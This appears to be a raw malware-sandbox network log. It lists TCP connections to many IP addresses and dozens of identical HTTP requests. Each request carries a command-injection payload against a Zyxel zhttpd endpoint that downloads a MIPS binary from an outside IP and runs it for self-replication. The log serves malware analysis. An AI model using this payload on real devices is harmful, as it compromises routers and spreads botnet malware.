          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
          Source: unknownTCP traffic detected without corresponding DNS query: 41.135.207.230
          Source: unknownTCP traffic detected without corresponding DNS query: 157.197.124.122
          Source: unknownTCP traffic detected without corresponding DNS query: 197.239.216.8
          Source: unknownTCP traffic detected without corresponding DNS query: 41.99.251.120
          Source: unknownTCP traffic detected without corresponding DNS query: 197.17.125.101
          Source: unknownTCP traffic detected without corresponding DNS query: 157.211.95.183
          Source: unknownTCP traffic detected without corresponding DNS query: 157.52.171.197
          Source: unknownTCP traffic detected without corresponding DNS query: 197.6.164.231
          Source: unknownTCP traffic detected without corresponding DNS query: 209.176.14.225
          Source: unknownTCP traffic detected without corresponding DNS query: 197.236.74.75
          Source: unknownTCP traffic detected without corresponding DNS query: 197.181.201.191
          Source: unknownTCP traffic detected without corresponding DNS query: 78.234.1.210
          Source: unknownTCP traffic detected without corresponding DNS query: 41.44.226.132
          Source: unknownTCP traffic detected without corresponding DNS query: 157.177.132.34
          Source: unknownTCP traffic detected without corresponding DNS query: 138.194.145.156
          Source: unknownTCP traffic detected without corresponding DNS query: 197.19.248.63
          Source: unknownTCP traffic detected without corresponding DNS query: 41.221.99.3
          Source: unknownTCP traffic detected without corresponding DNS query: 172.206.81.29
          Source: unknownTCP traffic detected without corresponding DNS query: 197.212.74.85
          Source: unknownTCP traffic detected without corresponding DNS query: 197.216.138.76
          Source: unknownTCP traffic detected without corresponding DNS query: 157.131.101.71
          Source: unknownTCP traffic detected without corresponding DNS query: 89.37.153.91
          Source: unknownTCP traffic detected without corresponding DNS query: 41.160.205.174
          Source: unknownTCP traffic detected without corresponding DNS query: 139.227.60.131
          Source: unknownTCP traffic detected without corresponding DNS query: 57.43.208.213
          Source: unknownTCP traffic detected without corresponding DNS query: 197.72.140.137
          Source: unknownTCP traffic detected without corresponding DNS query: 89.204.212.147
          Source: unknownTCP traffic detected without corresponding DNS query: 41.204.147.204
          Source: unknownTCP traffic detected without corresponding DNS query: 197.178.176.207
          Source: unknownTCP traffic detected without corresponding DNS query: 197.112.50.247
          Source: unknownTCP traffic detected without corresponding DNS query: 220.73.129.110
          Source: unknownTCP traffic detected without corresponding DNS query: 197.147.55.82
          Source: unknownTCP traffic detected without corresponding DNS query: 103.141.104.225
          Source: unknownTCP traffic detected without corresponding DNS query: 135.250.249.160
          Source: unknownTCP traffic detected without corresponding DNS query: 201.225.254.2
          Source: unknownTCP traffic detected without corresponding DNS query: 124.4.249.248
          Source: unknownTCP traffic detected without corresponding DNS query: 197.231.250.90
          Source: unknownTCP traffic detected without corresponding DNS query: 197.38.171.114
          Source: unknownTCP traffic detected without corresponding DNS query: 41.196.240.29
          Source: unknownTCP traffic detected without corresponding DNS query: 41.8.65.127
          Source: unknownTCP traffic detected without corresponding DNS query: 41.186.148.98
          Source: unknownTCP traffic detected without corresponding DNS query: 41.242.60.233
          Source: unknownTCP traffic detected without corresponding DNS query: 157.205.233.41
          Source: unknownTCP traffic detected without corresponding DNS query: 157.74.165.48
          Source: unknownTCP traffic detected without corresponding DNS query: 173.234.224.4
          Source: unknownTCP traffic detected without corresponding DNS query: 157.80.163.122
          Source: unknownTCP traffic detected without corresponding DNS query: 41.15.207.167
          Source: unknownTCP traffic detected without corresponding DNS query: 197.23.9.49
          Source: unknownTCP traffic detected without corresponding DNS query: 197.153.1.157
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
